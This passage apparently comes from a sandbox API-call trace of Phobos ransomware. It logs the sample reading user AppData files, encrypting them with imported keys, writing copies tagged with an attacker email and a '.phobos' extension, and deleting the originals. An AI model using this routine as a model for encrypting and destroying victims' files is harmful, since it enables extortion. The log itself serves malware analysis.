(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.241] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.241] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.242] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.242] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.242] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xfc, lpOverlapped=0x0) returned 1 [0198.242] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100, dwBufLen=0x100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100) returned 1 [0198.243] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x100, lpOverlapped=0x0) returned 1 [0198.243] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0198.243] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.243] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0198.243] CryptDestroyKey (hKey=0xa32be8) returned 1 [0198.243] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0198.244] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.244] CloseHandle (hObject=0x15c) returned 1 [0198.244] CloseHandle (hObject=0x140) returned 1 [0198.244] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76")) returned 1 [0198.244] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.249] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=581730) returned 1 [0198.249] CloseHandle (hObject=0x178) returned 1 [0198.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab")) returned 0x2020 [0198.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0198.249] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.249] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.250] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32b68) returned 1 [0198.250] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.250] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x8e062, lpOverlapped=0x0) returned 1 [0198.596] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8e070, dwBufLen=0x8e070 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8e070) returned 1 [0198.600] WriteFile (in: hFile=0x16c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x8e070, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x8e070, lpOverlapped=0x0) returned 1 [0198.610] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0198.610] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.610] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30, dwBufLen=0x30 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30) returned 1 [0198.610] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.610] WriteFile (in: hFile=0x16c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe2, lpOverlapped=0x0) returned 1 [0198.610] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.610] CloseHandle (hObject=0x178) returned 1 [0198.610] CloseHandle (hObject=0x16c) returned 1 [0198.610] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab")) returned 1 [0198.673] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.673] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.674] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=25340970) returned 1 [0198.674] CloseHandle (hObject=0x118) returned 1 [0198.675] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab")) returned 0x2020 [0198.675] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0198.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.703] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0198.703] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0198.703] ReadFile (in: hFile=0x118, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0198.792] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x80e40e, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0198.792] ReadFile (in: hFile=0x118, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0198.822] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x17eac2a, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0198.822] ReadFile (in: hFile=0x118, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0198.841] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32b68) returned 1 [0198.841] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.841] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050) returned 1 [0198.849] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.849] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0198.849] WriteFile (in: hFile=0x118, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0102, lpOverlapped=0x0) returned 1 [0198.870] SetEndOfFile (hFile=0x118) returned 1 [0198.880] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x17eac2a, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0198.880] WriteFile (in: hFile=0x118, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0198.881] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x80e40e, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0198.881] WriteFile (in: hFile=0x118, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0198.884] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0198.884] WriteFile (in: hFile=0x118, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0198.885] CloseHandle (hObject=0x118) returned 1 [0198.885] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.886] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=5399) returned 1 [0198.886] CloseHandle (hObject=0x118) returned 1 [0198.886] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata")) returned 0x2020 [0198.887] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.887] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.887] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.024] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa329e8) returned 1 [0199.025] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.025] ReadFile (in: hFile=0x118, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1517, lpOverlapped=0x0) returned 1 [0199.075] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1520, dwBufLen=0x1520 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1520) returned 1 [0199.075] WriteFile (in: hFile=0x16c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1520, lpOverlapped=0x0) returned 1 [0199.076] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328a8) returned 1 [0199.076] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.076] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0199.076] CryptDestroyKey (hKey=0xa328a8) returned 1 [0199.076] WriteFile (in: hFile=0x16c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0199.076] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.076] CloseHandle (hObject=0x118) returned 1 [0199.076] CloseHandle (hObject=0x16c) returned 1 [0199.076] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata")) returned 1 [0199.077] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.080] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=470) returned 1 [0199.080] CloseHandle (hObject=0x16c) returned 1 [0199.080] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol")) returned 0x2020 [0199.080] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.080] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.080] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0199.081] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa329e8) returned 1 [0199.081] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.081] ReadFile (in: hFile=0x16c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1d6, lpOverlapped=0x0) returned 1 [0199.082] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1e0) returned 1 [0199.082] WriteFile (in: hFile=0x118, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1e0, lpOverlapped=0x0) returned 1 [0199.083] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328a8) returned 1 [0199.083] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.083] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0199.083] CryptDestroyKey (hKey=0xa328a8) returned 1 [0199.083] WriteFile (in: hFile=0x118, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0199.083] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.083] CloseHandle (hObject=0x16c) returned 1 [0199.083] CloseHandle (hObject=0x118) returned 1 [0199.083] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" 